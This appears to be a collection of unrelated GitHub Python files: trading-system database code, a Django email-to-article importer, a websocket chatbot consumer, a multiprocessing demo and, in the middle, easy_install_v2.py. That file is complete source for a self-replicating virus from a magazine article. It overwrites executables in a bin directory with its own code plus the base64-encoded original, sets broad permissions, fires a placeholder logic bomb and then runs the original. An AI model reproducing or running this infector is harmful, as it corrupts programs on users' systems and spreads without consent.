    if "playlist" in cleaned:
        cleaned = cleaned.replace("playlist", "").strip()
    return cleaned
def check_required():
    """Check that every external audio program we shell out to is on PATH.

    Returns True when all of them are found; otherwise logs a critical
    message for the first missing program and returns False.
    """
    # Open the null device with a context manager so the descriptor is
    # released even on the early-return path (the original leaked it).
    with open(devnull, "w") as nulfp:
        for prog in ['sox', 'flac', 'lame', 'play', 'amixer']:
            # `which` exits with 0 exactly when the program is on PATH.
            check = Popen(['which', prog], stdout=nulfp.fileno(),
                          stderr=nulfp.fileno()).wait()
            if check != 0:
                logging.critical("Necessary %s program not found on your system", prog)
                return False
    return True
def flac_time(t):
    """Format *t* seconds as "mm:ss.mmm", the timestamp form flac expects."""
    # Work in milliseconds and peel off each unit with divmod instead of the
    # original reduce() one-liner.
    seconds, millis = divmod(t * 1000, 1000)
    minutes, seconds = divmod(seconds, 60)
    return "%02d:%02d.%03d" % (minutes, seconds, millis)
def sox_time(t):
    """Format *t* seconds as "hh:mm:ss.mmm", the timestamp form sox expects."""
    # Same unit-peeling as flac_time, with one extra divmod for the hours.
    seconds, millis = divmod(t * 1000, 1000)
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    return "%02d:%02d:%02d.%03d" % (hours, minutes, seconds, millis)
| terual/sbcc | module/functions.py | functions.py | py | 2,415 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.error",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "os.devnull",
"line_number": 57,
"usage_type": "argument"
},
{
"api_name": "subprocess.Popen",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "logging.critical",
... |
32033182710 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
@author:ai
@file:rootNet.py
@time:2020/06/01
"""
import traceback
import warnings
from collections import defaultdict
import arrow
import pandas as pd
from configs.riskConfig import FUTURE_ENDS
from tradingSystem import Order
from configs.Database import mysql, Database
from tradingSystem.rootNet.RootNetTrading import RootNetTrading
from tradingSystem.CATS.catsserverapi.catsConfig import futureEnds, CatsTypeTotradeAcct
from tradingSystem.CATS.catsserverapi.catsDictionary import CASH, TOTALASSET, POSITIONASSET
from utils.Date import getTradeSectionDates
strategyEnvToTradingEnv = {
'prod': 'prod',
'dev': 'test'
}
class rootNet():
    def __init__(self, env='dev', mode='test', commit=True):
        """Trading facade for the rootNet broker channel.

        :param env: which MySQL configuration to use ('prod'|'dev')
        :param mode: trading-server environment handed to RootNetTrading
        :param commit: whether DB writes are committed (False = dry run)
        """
        self.env = env
        self.mode = mode
        self.commit = commit
        self.trade_date = str(arrow.now().date())
        # Previous trading day: first element of the 2-day window ending today.
        self.pre_trade_date = self.pre_date = getTradeSectionDates(self.trade_date, -2)[0]
        self.tradingServer = RootNetTrading(env=mode)
        self.userAcctInfo = defaultdict(dict)
        self.accountToStrategyid = {}  # maps trading account -> strategy id
        self.syst_id = 'rootNet'
        self.security_type = {}  # maps trading account -> CATS account type
        self.need_change_cash = 0
        # Index codes whose close prices are always recorded by storeClosePrice.
        self.codesStorage = {'000001.SH', '000300.SH', '399001.SZ'}
        # Maps a CATS trade-type code to (buy/sell flag, long/short flag).
        self.tradeTypeToInt = {
            'B': (1, 1),  # stock buy
            'S': (-1, 1),  # stock sell
            'B/OPEN': (1, 1),  # open a long position
            'S/OPEN': (1, -1),  # open a short position
            'B/CLOSE': (-1, -1),  # close a short position
            'S/CLOSE': (-1, 1)  # close a long position
        }
    def getPriceInfo(self, windcode):
        # Thin wrapper: price/quote snapshot for one wind code from the broker.
        return self.tradingServer.getStkInfo(windcode)
    def login(self, acct_id, acct_pwd, opt_id, opt_pwd):
        """
        Log in with trading-account (acct) and operator (opt) credentials.
        :return:
        """
        self.tradingServer.login(acctId=acct_id, acctPwd=acct_pwd,
                                 optId=opt_id, optPwd=opt_pwd)
    def close(self):
        # Drop the connection to the trading server.
        self.tradingServer.disconnect()
def getCashAndAssert(self):
"""
:return: {account:(cash,position_value,totalAsset)}
"""
result = {}
fundInfo = self.tradingServer.getFundInfo()
for account, info in fundInfo.items():
position_value = info.get('currentStkValue', 0)+info.get('marginUsedAmt', 0)
cash = info['usableAmt'] + info['tradeFrozenAmt']
totalAsset = cash + position_value
result[account] = (cash, position_value, totalAsset)
return result
    def getAccountInfoByStrategyidsAndLogin(self, strategy_ids):
        """
        Load account credentials for the given strategy ids and log every
        rootNet account in; also fills the account -> strategy/type lookups.
        """
        sql_user = "select sys_id,user_acct,user_acct_pwd from user_account"
        with mysql(self.env) as cursor:
            cursor.execute(sql_user)
            data = cursor.fetchall()
            for row in data:
                self.userAcctInfo[row[0]]['user_acct'] = row[1]
                self.userAcctInfo[row[0]]['user_acct_pwd'] = row[2]
        # Turn the python list repr into "id1, id2, ..." for the IN clause.
        self.strategids_str = str(strategy_ids).replace("[", "").replace("]", "").strip(",")
        sql_cash = "select strategy_id,sys_id,acct_type,cats_acct_type,trade_acct,trade_acct_pwd from cash_account where strategy_id in ({})".format(
            self.strategids_str)
        with mysql(self.env, cursor_type='dict') as cursor:
            cursor.execute(sql_cash)
            data = cursor.fetchall()
            for row in data:
                if row['sys_id'] == 'rootNet':
                    self.tradingServer.login(acctId=row['trade_acct'],
                                             acctPwd=row['trade_acct_pwd'],
                                             optId=self.userAcctInfo[row['sys_id']]['user_acct'],
                                             optPwd=self.userAcctInfo[row['sys_id']]['user_acct_pwd'],
                                             acctType=row['acct_type'])
                    self.accountToStrategyid[row['trade_acct']] = row['strategy_id']
                    self.security_type[row['trade_acct']] = row['cats_acct_type']
                else:
                    # Other trading systems are not handled by this facade.
                    warnings.warn("not support sys_id:{} of strategy:{}".format(row['sys_id'], row['strategy_id']))
    def _get_pre_sod_total_asset(self, strategy_id, trade_date, account_type):
        # Look up the total asset recorded for a (strategy, date, type) key.
        # NOTE(review): returns the raw first row (a 1-tuple), not the scalar
        # value inside it — the caller appears to rely on that; confirm
        # before changing.
        with mysql(self.env) as cursor:
            sql = "select total_asset from account where strategy_id = %s and trade_date = %s and account_type = %s"
            cursor.execute(sql, (strategy_id, trade_date, account_type))
            data = cursor.fetchall()
            if data:
                return data[0]
            else:
                return None
def getPosition(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
positions = self.tradingServer.getPositions(where=param)
return positions
def getTrades(self, tradeAcct=''):
"""
:return:
"""
param = {'acct': [tradeAcct]} if tradeAcct else {}
trades = self.tradingServer.getTrades(where=param)
return trades
    def store_position(self):
        """Snapshot today's holdings into the `position` table."""
        positions = self.getPosition()
        # The broker API may return either a DataFrame or a plain container;
        # both empty cases are treated as "nothing to store".
        if isinstance(positions, pd.DataFrame):
            if positions.empty:
                print("今日持仓为空!")
                return
        else:
            if not positions:
                print("今日持仓为空!")
                return
        positions['strategy_id'] = positions['ACCOUNT'].map(self.accountToStrategyid)
        rows = []
        for index, row in positions.iterrows():
            rows.append((row['strategy_id'], self.trade_date, row["LS"], row['WIND_CODE'],
                         CatsTypeTotradeAcct[self.security_type[row['ACCOUNT']]],
                         row['POSITION'], row['AMOUNT']))
            # Remember every held code so storeClosePrice() covers it later.
            self.codesStorage.add(row['WIND_CODE'])
        sql_insert = "insert into position (strategy_id,trade_date,LS,windcode,account_type,volume,amount) values (%s,%s,%s,%s,%s,%s,%s)"
        self.saveToDb('position', sql_insert, rows)
def store_account(self):
accountInfo = self.getCashAndAssert()
print(accountInfo)
rows = []
for acct, info in accountInfo.items():
# (cash,position_value,totalAsset)}
cash, position_value, totalAsset = info
strategy_id = self.accountToStrategyid[acct]
sod_total_asset = self._get_pre_sod_total_asset(strategy_id, self.pre_date,
CatsTypeTotradeAcct[self.security_type[acct]])
if sod_total_asset == None:
sod_total_asset = totalAsset
rows.append(
(strategy_id, self.trade_date, CatsTypeTotradeAcct[self.security_type[acct]], position_value, cash,
totalAsset, sod_total_asset))
sql_insert = "insert into `account` (strategy_id,trade_date,account_type,position_value,cash,total_asset,sod_total_asset) " \
"values (%s,%s,%s,%s,%s,%s,%s)"
self.saveToDb('account', sql_insert, rows)
    def store_today_trades(self, ):
        """Persist today's fills into the `trade` table."""
        trades = self.getTrades()
        # As with positions, the result may be a DataFrame or a container.
        if isinstance(trades, pd.DataFrame):
            if trades.empty:
                print("今日无成交!")
                return
        else:
            if not trades:
                print("今日无成交!")
                return
        # ["WIND_CODE","SECURITY_CODE", "MARKET_TYPE", "SECURITY_NAME",
        # "TRADE_TYPE", "TRADE_PRICE", "TRADE_VOLUME", "TRADE_AMOUNT"]]
        # NOTE(review): the next line is a no-op left over from a refactor.
        trades = trades
        rows = []
        for index, row in trades.iterrows():
            # tradeTypeToInt maps the CATS trade type to (BS, LS) flags.
            rows.append((self.trade_date, self.accountToStrategyid[row['ACCOUNT']], row['WIND_CODE'],
                         *self.tradeTypeToInt[row['TRADE_TYPE']],
                         row['TRADE_AMOUNT'], row['TRADE_VOLUME'], row['TRADE_PRICE']))
            self.codesStorage.add(row['WIND_CODE'])
        sql_insert = "insert into trade (trade_date,strategy_id,windcode,BS,LS,notional,volume,price) " \
                     "values (%s,%s,%s,%s,%s,%s,%s,%s)"
        self.saveToDb('trade', sql_insert, rows)
    def submitOrder(self, wind_code: str, tradeSide: str, targetVol: int, price: float):
        """
        Submit an order directly.
        :param wind_code: wind code of the instrument
        :param tradeSide: trade direction (B/S)
        :param targetVol: target volume
        :param price: limit price
        """
        # NOTE(review): self.acct_id is never assigned in __init__, so this
        # raises AttributeError as written — confirm where the account id is
        # supposed to come from before relying on this method.
        order = Order(windCode=wind_code, orderType=tradeSide, orderQty=targetVol, orderPrice=price)
        self.tradingServer.sendOrder({self.acct_id: [order]})
def cancelOrders(self, windcode=''):
"""
"""
data = self.tradingServer.getOriginalOrder()
cancelkeys = self.getCancelKeys(data, windcode)
self.tradingServer.cancelOrder(cancelkeys)
    def getCancelKeys(self, df, windcode=''):
        """
        Reduce the original-order data down to cancellable orders (optionally
        a single wind code) and return their cancel ids.
        :param df: original orders, normally a pandas DataFrame
        :param windcode: optional wind code filter; '' keeps all codes
        :return: iterable of ids shaped like acctid^^exchid^^contractNum
        """
        if isinstance(df, pd.DataFrame):
            if not df.empty:
                # Only rows flagged cancellable can be sent to cancelOrder.
                df = df[df["CANCELABLE"] == 'Y']
                if windcode:
                    df = df[df['WIND_CODE'] == windcode]
        else:
            if not df:
                return []
        ids = df.CANCEL_KEY.values
        return ids
    def getWindCodeAndMMF(self):
        """Read static config attribute/value pairs for this strategy.

        NOTE(review): relies on self.strategy_id, which is never assigned in
        __init__ — confirm where it is set before calling this method.
        """
        sql = "select attribute,value from strategy_static_configs where strategy_id = %s"
        result = {}
        with mysql(self.env) as cursor:
            cursor.execute(sql, self.strategy_id)
            data = cursor.fetchall()
            if data:
                for row in data:
                    result[row[0]] = row[1]
        return result
    def getPositionRatioOfMMF(self, windCode=''):
        """Target position ratio for a code, or 0 when none is configured.

        NOTE(review): also depends on the never-assigned self.strategy_id;
        the "'%s'" placeholder is quoted inside the SQL string (verify the
        driver's interpolation), and on a hit this returns the raw first row
        (a tuple) rather than the scalar ratio.
        """
        sql = "select target_ratio from target_position where strategy_id = %s and windcode = '%s'"
        with mysql(self.env) as cursor:
            cursor.execute(sql, (self.strategy_id, windCode))
            data = cursor.fetchall()
            if data:
                return data[0]
            else:
                return 0
    def storeClosePrice(self):
        """Collect close-price info for every tracked wind code.

        :return: {windcode: (trade_date, windcode, last_price, pct_change,
                  volume, amount, pre_close)}
        NOTE(review): `rows` is built but never stored or returned — confirm
        whether a DB write was intended here.
        """
        rows = []
        closePrice = {}
        for windCode in self.codesStorage:
            stkInfo = self.tradingServer.getStkInfo(windCode)
            if windCode.endswith(FUTURE_ENDS):
                # Futures-style codes: change is measured vs. the settlement.
                preSettlePrice = stkInfo.preSettlementPrice
                preClosePrice = stkInfo.preClosePrice
            else:
                preSettlePrice = stkInfo.closePrice
                preClosePrice = stkInfo.closePrice
            # Guard against a zero/None reference price.
            pctchange = (stkInfo.newPrice - preSettlePrice) / preSettlePrice if preSettlePrice else 0
            rows.append(
                (self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt)
            )
            closePrice[windCode] = (
                self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt,
                preClosePrice)
        return closePrice
def saveToDb(self,table, sql_insert, rows):
with mysql(self.env, commit=self.commit) as cursor:
try:
sql_delete = "delete from {} where trade_date = '{}' and strategy_id in ({})".format(table, self.trade_date, self.strategids_str)
cursor.execute(sql_delete)
cursor.executemany(sql_insert, rows)
except:
traceback.print_exc() | Joey2634/MultiFactorFramework | tradingSystem/CATS/catsserverapi/UseAITrading/rootNet.py | rootNet.py | py | 11,539 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "arrow.now",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "utils.Date.getTradeSectionDates",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "tradingSystem.rootNet.RootNetTrading.RootNetTrading",
"line_number": 36,
"usage_type": "call"
... |
27049180203 | from datetime import datetime
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils.translation import gettext as _
from imap_tools import MailBox, AND
from filebrowser.base import FileObject
from blog.models import Article
from pages.models import GalleryImage
from users.models import User
def process_message(message, usr):
    """Parse a structured e-mail body into an Article plus gallery images.

    The body must contain TITLE[...], DESCRIPTION[...], TEXT[...], DATE[...],
    CATEGORIES[...] and NOTICE[...] sections (marker names localized via
    gettext). Attachments named "<position>-<caption>.<ext>" become
    GalleryImage rows attached to the new article.
    """
    msg = message.text
    d = {'title': _('TITLE['), 'intro': _('DESCRIPTION['),
        'body': _('TEXT['), 'date': _('DATE['),
        'tags': _('CATEGORIES['), 'notice': _('NOTICE[')}
    for key, value in d.items():
        # Drop the section marker, capture everything up to the closing
        # bracket, then continue parsing on the remainder.
        msg = msg.replace(value, '')
        d[key] = msg.split(']', 1)[0].replace('\r\n', '')
        msg = msg.split(']', 1)[1]
    try:
        d['date'] = datetime.strptime(d['date'], '%d/%m/%y')
    except ValueError:
        # Narrowed from a bare except: only a malformed date string should
        # fall back to "now".
        d['date'] = now()
    post = Article(title=d['title'], intro=d['intro'], body=d['body'],
        date=d['date'], tags=d['tags'], author=usr, notice=d['notice'] )
    try:
        post.save()
    except Exception:
        # Deliberate best-effort: an unsaved article aborts processing.
        # Narrowed from bare except so KeyboardInterrupt etc. still propagate.
        return
    for att in message.attachments:  # list: [Attachment objects]
        file = SimpleUploadedFile(att.filename, att.payload,
            att.content_type)
        # Filenames are "<position>-<caption>.<ext>".
        position = att.filename.split('-', 1)[0]
        caption = att.filename.split('-', 1)[1]
        caption = caption.rsplit('.', 1)[0]
        instance = GalleryImage(post_id=post.uuid, image=file,
            position=position, caption=caption)
        #save the instance and upload the file
        instance.save()
        #update the filebrowse field
        instance.fb_image = FileObject(str(instance.image))
        instance.save()
def do_command():
    """Fetch unseen 'articles' e-mails over IMAP and turn them into posts."""
    # Feature flag: the whole fetcher can be disabled from settings.
    if not settings.FETCH_EMAILS:
        return
    HOST = settings.IMAP_HOST
    USER = settings.IMAP_USER
    PASSWORD = settings.IMAP_PWD
    # NOTE(review): PORT and FROM are read from settings but never used.
    PORT = settings.IMAP_PORT
    FROM = settings.IMAP_FROM
    with MailBox(HOST).login(USER, PASSWORD, 'INBOX') as mailbox:
        # Only unseen messages with the localized 'articles' subject.
        for message in mailbox.fetch(AND(seen=False, subject=_('articles'), ),
                                     mark_seen=True):
            try:
                # The sender must map to a user with article-add permission.
                usr = User.objects.get(email=message.from_)
                if not usr.has_perm('blog.add_article'):
                    continue
            except:
                # Unknown sender: skip the message silently.
                continue
            process_message(message, usr)
class Command(BaseCommand):
    # Django management command entry point: runs one e-mail fetch pass.
    def handle(self, *args, **options):
        do_command()
| andywar65/project_repo | blog/management/commands/fetch_article_emails.py | fetch_article_emails.py | py | 2,479 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.utils.translation.gettext",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.gettext",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.gettext",
"line_number": 20,
"usage_type": "ca... |
13329932727 | import json
from channels.generic.websocket import WebsocketConsumer
from django.contrib.auth.models import User
from gestion_admin.models import Article, Historique
class ChatConsumer(WebsocketConsumer):
    def connect(self):
        # Resolve the authenticated user and the article bound to this room.
        self.user = User.objects.get(username=self.scope["user"])
        self.historique = Historique.objects.filter(user=self.user)
        self.article = Article.objects.get(id=self.scope['url_route']['kwargs']['room'])
        print(self.user, self.article)
        # Latest history entry for the user (queryset indexed at count-1).
        self.last_history = self.historique[self.historique.count()-1]
        self.last_article = self.last_history.article
        self.id = self.last_article.id
        self.title = self.last_article.title
        self.categorie = self.last_article.categorie
        # The article body is stored as a file field; decoded as UTF-8 text.
        self.text = self.last_article.file.read().decode('utf-8')
        print(self.last_history, self.last_article)
        print(self.text)
        # Accept the websocket handshake once the state is loaded.
        self.accept()
    def disconnect(self, close_code):
        # Close the socket; close_code is intentionally ignored.
        self.close()
def receive(self, text_data):
reponse = None
text_data_json = json.loads(text_data)
message = text_data_json['message']
print(message)
if 'hello' in message:
reponse = {
'type' : 'text',
'text' : "Hello I'am ChatBot!"
}
elif 'hi' in message:
reponse= {
'type' : 'link',
'article' : 1,
'text' : 'hello'
}
self.send(text_data=json.dumps(reponse)) | meryem1994/chatbot-project | user/consumers.py | consumers.py | py | 1,526 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "channels.generic.websocket.WebsocketConsumer",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.contrib.auth.models.User.objects.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects",
"line_numbe... |
31739800389 | from multiprocessing import Process
import time
class MyProcess(Process):
    """Process subclass that announces when it starts and finishes."""

    def __init__(self, name):
        super().__init__()
        # Assign through Process's `name` property so the usual validation
        # still applies.
        self.name = name

    def run(self):
        # Body executed in the child process after start().
        print("%s is running" % self.name)
        time.sleep(1)
        print("%s is done" % self.name)
if __name__=="__main__":
p=MyProcess("subprocess_1")
p.start()
print("main process end") | bigcpp110/python_learning | 并发编程/process_class.py | process_class.py | py | 400 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "multiprocessing.Process",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
}
] |
75118097702 | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
    """Return True when *content* equals the infection-marker line."""
    marker = b'# === INFECTED ===\n'
    return marker == content
def bomb():
    # Logic-bomb payload of this educational sample: harmless, only prints.
    print('BEAAAAAAAAAAH!')
# WARNING: educational self-replicating sample (from a magazine article).
# Do NOT run. Comments below were translated from French / added for
# analysis only; the code itself is byte-identical.
with open(fileToCorrupt, 'rb') as currentFile:
    ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
    # Current target already carries the marker: pick another, uninfected
    # file from the same directory at random.
    filenames = os.listdir(pathToCorrupt)
    random.shuffle(filenames)
    for cmd in filenames:
        if cmd != cmd_init:
            with open(pathToCorrupt + cmd, 'rb') as newFile:
                ftcLines = newFile.readlines()
            if not isInfected(ftcLines[1]):
                fileToCorrupt = pathToCorrupt + cmd
                break
    else:
        print('All files already corrupted!')
        exit(0)
# ftcLines holds the binary code of the target program
ftcLines = b''.join(ftcLines)
# Determine where the original executable code is located
with open(argv[0], 'rb') as currentFile:
    content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
    if startOrigin:
        # Everything after the marker is the base64 payload ("# " stripped).
        original = content[i][2:]
    else:
        virus.append(content[i])
        if content[i] == b'# === ORIGINAL ===\n':
            startOrigin = True
# virus holds the replicator; original holds the original binary code.
# Erase the executable, write the Python code and append the binary code.
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
    for line in virus:
        currentFile.write(line)
    currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Logic bomb
bomb()
# Execute the original code (unpacked to a temp file)
try:
    if argv[0] != './easy_install_v2.py':
        if original is None:
            original = ftcLines
        temp = tempfile.NamedTemporaryFile(delete=True)
        with open(temp.name, 'wb') as tmpCmdFile:
            tmpCmdFile.write(base64.b64decode(original))
        os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
        temp.file.close()
        os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
    exit(2)
# === ORIGINAL ===
| GLMF/GLMF201 | Libs_et_Modules/easy_install_v2.py | easy_install_v2.py | py | 2,566 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "os.remove",
"line_number": 59,... |
4000738437 | import argparse
import math
from pathlib import Path
import random
import sys
import numpy as np
import pandas as pd
# Default location of the full labelled training pool.
TRAIN_POOL_FILEPATH = "../../outputs/data_generation/train_pool.tsv"
# Per-strategy/run/round output paths (format args: strategy, run, round).
TRAIN_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/train.tsv"
TO_PREDICT_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/to_predict.tsv"
PREDICTED_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/predicted.tsv"
STRATIFIED_LOG_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/stratified_log.txt"
# NOTE(review): main() starts its own bin search at 10 and never reads this.
STRATIFIED_NUM_BINS = 10
# Valid values for --sampling_strategy.
SAMPLING_STRATEGIES = [
    "certain_pos",
    "uncertain",
    "stratified",
    "random",
]
def parse_argument() -> argparse.Namespace:
    """Define and parse this script's command-line arguments."""
    parser = argparse.ArgumentParser(
        description="Generate the first version of annotation.")
    parser.add_argument("--random_state", type=int, help="Set random state.")
    parser.add_argument(
        "--sampling_strategy", type=str, required=True,
        help="Sampling strategy to use (stratified|certain_pos|uncertain).")
    parser.add_argument(
        "--run", type=int, required=True,
        help="Specify which run this is for.")
    parser.add_argument(
        "--round", type=int, required=True, help="Current round.")
    parser.add_argument(
        "--total_rounds", type=int, required=True,
        help="Total number of rounds.")
    parser.add_argument(
        "--train_pool_filepath", type=str, default=TRAIN_POOL_FILEPATH,
        help=f"Training pool filepath. (Default: {TRAIN_POOL_FILEPATH})")
    return parser.parse_args()
def _drop_duplicates():
    # Placeholder: never called and has no body yet — presumably intended
    # for future deduplication logic. TODO: implement or remove.
    pass
def main():
    """Build this round's train/to_predict splits for one sampling strategy."""
    args = parse_argument()
    if args.sampling_strategy not in SAMPLING_STRATEGIES:
        # NOTE: "startegy" typo is in the runtime message; left as-is here.
        raise ValueError(f"Invalid sampling startegy: {args.sampling_strategy}")
    print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} START *****")
    if args.random_state:
        random.seed(args.random_state)
    # Shuffle the whole pool up front so round 1's head slice is random.
    df_train_pool = pd.read_csv(args.train_pool_filepath, sep='\t')
    df_train_pool = df_train_pool.sample(frac=1, random_state=args.random_state)
    print(f"Train pool shape: {df_train_pool.shape[0]}")
    num_train_per_round = math.ceil(df_train_pool.shape[0] / args.total_rounds)
    print(f"Number of training data per round: {num_train_per_round}")
    train_filepath = TRAIN_FILEPATH_FS.format(
        args.sampling_strategy, args.run, args.round)
    to_predict_filepath = TO_PREDICT_FILEPATH_FS.format(
        args.sampling_strategy, args.run, args.round)
    Path(train_filepath).parent.mkdir(parents=True, exist_ok=True)
    Path(to_predict_filepath).parent.mkdir(parents=True, exist_ok=True)
    #
    if args.round == 1:
        # Round 1: no predictions yet, so take a plain head/tail split.
        df_train = df_train_pool[:num_train_per_round]
        df_to_predict = df_train_pool[num_train_per_round:]
        print(f"Training data shape: {df_train.shape[0]}")
        print(f"To predict data shape: {df_to_predict.shape[0]}")
        print(f"Saving training data to '{train_filepath}'")
        df_train.to_csv(train_filepath, sep='\t', index=False)
        print(f"Saving to_predict data to '{to_predict_filepath}'")
        df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
    else:
        # Later rounds: pick new examples from the previous round's
        # predictions according to the chosen sampling strategy.
        predicted_filepath = PREDICTED_FILEPATH_FS.format(
            args.sampling_strategy, args.run, args.round-1)
        df_predicted = pd.read_csv(predicted_filepath, sep='\t', keep_default_na=False)
        df_predicted.sort_values("prob", ascending=False, inplace=True)
        print(f"Predicted '{predicted_filepath}' size: {df_predicted.shape[0]}")
        prev_train_filepath = TRAIN_FILEPATH_FS.format(
            args.sampling_strategy, args.run, args.round-1)
        df_train = pd.read_csv(prev_train_filepath, sep='\t', keep_default_na=False)
        print(f"Previous training data '{prev_train_filepath}' size: {df_train.shape[0]}")
        if args.sampling_strategy == "certain_pos":
            # Most-confident-positive first (already sorted by prob desc).
            df_train_new = df_predicted[:num_train_per_round].copy()
            df_to_predict = df_predicted[num_train_per_round:].copy()
        elif args.sampling_strategy == "uncertain":
            # Uncertainty = distance from a confident 0 or 1 prediction.
            df_predicted["uncertainty"] = df_predicted["prob"].apply(lambda x: np.min([1-x, x]))
            df_predicted.sort_values("uncertainty", ascending=False, inplace=True)
            df_train_new = df_predicted[:num_train_per_round].copy()
            df_to_predict = df_predicted[num_train_per_round:].copy()
            df_train_new.drop("uncertainty", axis=1, inplace=True)
            df_to_predict.drop("uncertainty", axis=1, inplace=True)
        elif args.sampling_strategy == "stratified":
            stratified_log_filepath = STRATIFIED_LOG_FILEPATH_FS.format(
                args.sampling_strategy, args.run, args.round)
            Path(stratified_log_filepath).parent.mkdir(parents=True, exist_ok=True)
            Path(stratified_log_filepath).unlink(missing_ok=True)
            # Try 10 bins first, shrinking until every bin has enough rows.
            # NOTE(review): if even 1 bin is too small, df_train_new is never
            # bound and the code below raises NameError — confirm intent.
            for num_linspace in range(11, 1, -1):
                print(f"Number of prob bins testing: {num_linspace-1}")
                num_train_per_bin = math.floor(num_train_per_round / (num_linspace-1))
                num_train_final_bin = num_train_per_round - num_train_per_bin*(num_linspace-2)
                print(f"num_train_per_bin: {num_train_per_bin}")
                df_predicted_copy = df_predicted.copy()
                df_predicted_copy["prob_bin"] = pd.cut(
                    df_predicted_copy["prob"],
                    bins=np.linspace(0, 1, num_linspace),
                    include_lowest=True,
                )
                df_grouped_size = df_predicted_copy.groupby("prob_bin").size()
                print("Predicted grouped by prob bin:\n", df_grouped_size)
                with open(stratified_log_filepath, 'a') as _f:
                    _f.write(f"num_bins: {num_linspace-1}\n")
                    _f.write(f"num_train_per_bin: {num_train_per_bin}\n")
                    _f.write(f"num_train_final_bin: {num_train_final_bin}\n")
                    _f.write("Predicted grouped by prob bin:\n")
                    _f.write(str(df_grouped_size)+'\n\n')
                if num_train_final_bin > min(df_grouped_size.tolist()):
                    print("Not enough training data per bin. Reducing the prob bin...")
                    continue
                else:
                    print("Enough training data")
                    train_new_data = []
                    to_predict_data = []
                    cur_bin = 1
                    df_grouped = df_predicted_copy.groupby("prob_bin")
                    for group, df_subset in df_grouped:
                        df_subset = df_subset.sample(frac=1, random_state=args.random_state)
                        # The last bin absorbs the rounding remainder.
                        n = num_train_per_bin if cur_bin < (num_linspace-1) else num_train_final_bin
                        train_new_data.append(df_subset[:n])
                        to_predict_data.append(df_subset[n:])
                        cur_bin += 1
                    df_train_new = pd.concat(train_new_data).drop("prob_bin", axis=1)
                    df_to_predict = pd.concat(to_predict_data).drop("prob_bin", axis=1)
                    break
        elif args.sampling_strategy == "random":
            df_predicted_shuffled = df_predicted.sample(frac=1, random_state=args.random_state)
            df_train_new = df_predicted_shuffled[:num_train_per_round].copy()
            df_to_predict = df_predicted_shuffled[num_train_per_round:].copy()
        # Keep the "prob" column only in the *_new.tsv audit file.
        train_new_filepath = train_filepath.replace('.tsv', '_new.tsv')
        print(f"Saving training data new to this round to '{train_new_filepath}'")
        df_train_new.to_csv(train_new_filepath, sep='\t', index=False)
        df_train_new.drop("prob", axis=1, inplace=True)
        df_train = pd.concat([df_train, df_train_new])
        df_to_predict.drop("prob", axis=1, inplace=True)
        print(f"Saving training data to '{train_filepath}'")
        df_train.to_csv(train_filepath, sep='\t', index=False)
        print(f"Saving to_predict data to '{to_predict_filepath}'")
        df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
    print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} END *****")
# Script entry point.
if __name__ == '__main__':
    main()
| IBPA/SemiAutomatedFoodKBC | src/data_generation/prepare_training_data.py | prepare_training_data.py | py | 8,371 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "argparse.Namespace",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "random.seed",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pandas.re... |
35396554268 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from abc import abstractmethod, abstractproperty
